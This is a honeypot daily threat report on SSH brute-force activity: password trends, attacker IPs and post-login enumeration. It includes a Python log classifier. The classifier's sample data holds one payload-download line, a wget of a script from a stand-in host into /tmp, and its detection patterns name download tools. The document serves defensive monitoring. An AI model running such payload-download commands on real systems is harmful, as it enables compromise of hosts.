Honeypot Threat Analysis — April 14, 2026

High-severity day with 1,373 SSH connections and 195 post-auth commands. Attackers escalate from probing to active exploitation.

ssh-brute-force, honeypot, high-severity, threat-intelligence

Threat Landscape Overview

A significant escalation: connections nearly quadrupled to 1,373, coming from 87 unique IPs. More concerning, 195 post-authentication commands were executed, meaning attackers are no longer just testing credentials. They're actively trying to exploit compromised systems.

SSH Brute Force Analysis

1,265 login attempts represent aggressive credential stuffing at scale. The password dictionary has evolved: admin, 123456, 123, solana, and 1234 dominate. The appearance of 123 as a standalone password shows attackers are getting lazier — or more optimistic.

Top attacker 176.65.139.103 launched a sustained campaign, supported by persistent scanner 80.66.66.10 and Vietnamese IPs 171.231.191.10 and 171.231.184.15. The Vietnamese cluster suggests a compromised network being used as attack infrastructure.

The 195 commands executed post-login mark a qualitative shift. Attackers who get past the honeypot’s fake authentication are running system enumeration commands — checking for architecture, running processes, and attempting to download payloads. This is real exploitation behavior, not just scanning.
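The split between credential probing and post-login activity described above can be computed per source IP from the honeypot's event log. The following is an added example, not the lab's own tooling: the JSON-lines event format, the field names (`event`, `src_ip`, `password`, `input`), the matching patterns and the sample events are all assumptions constructed for illustration.

```python
import json
import re
from collections import Counter

# Constructed sample events in a hypothetical JSON-lines format (documentation IPs).
SAMPLE_LOG = """\
{"event": "login", "src_ip": "203.0.113.5", "password": "123456"}
{"event": "command", "src_ip": "203.0.113.5", "input": "uname -m"}
{"event": "command", "src_ip": "203.0.113.5", "input": "ps aux | grep miner"}
{"event": "command", "src_ip": "203.0.113.5", "input": "cd /tmp; wget http://example.invalid/x.sh"}
{"event": "login", "src_ip": "198.51.100.7", "password": "123"}
{"event": "command", "src_ip": "198.51.100.9", "input": "echo ok"}
truncated-line-that-is-not-json
"""

# Categories mirror the behaviours named in the report; the patterns are assumptions.
CATEGORIES = [
    ("payload_download", re.compile(r"\b(wget|curl|tftp)\b")),
    ("architecture_check", re.compile(r"\b(uname|lscpu|nproc)\b|/proc/cpuinfo")),
    ("process_listing", re.compile(r"\b(ps|top|pgrep)\b")),
]

def classify(command):
    """Return the set of categories a post-auth command line falls into."""
    hits = {name for name, pattern in CATEGORIES if pattern.search(command)}
    return hits or {"other"}

def summarize(log_text):
    """Separate credential probing from post-auth activity, per source IP."""
    passwords, categories = Counter(), Counter()
    probing_ips, escalated_ips = set(), set()
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip corrupt lines rather than abort the daily run
        if event.get("event") == "login":
            passwords[event.get("password", "")] += 1
            probing_ips.add(event["src_ip"])
        elif event.get("event") == "command":
            categories.update(classify(event.get("input", "")))
            escalated_ips.add(event["src_ip"])
    return {
        "login_attempts": sum(passwords.values()),
        "top_passwords": passwords.most_common(5),
        "command_categories": dict(categories),
        "escalated_ips": sorted(escalated_ips),
        "probe_only_ips": sorted(probing_ips - escalated_ips),
    }
```

Calling `summarize(SAMPLE_LOG)` returns the counts as a dictionary; IPs listed under `escalated_ips` are the ones that moved past credential testing and are the natural first candidates for blocking and reporting.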

Community Defense

All 87 attacker IPs and their associated TTPs (tactics, techniques, and procedures) are shared across AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield.


This analysis was generated for the Raspberry Pi 5 honeypot lab in Barcelona, Spain. View the raw data report for complete metrics.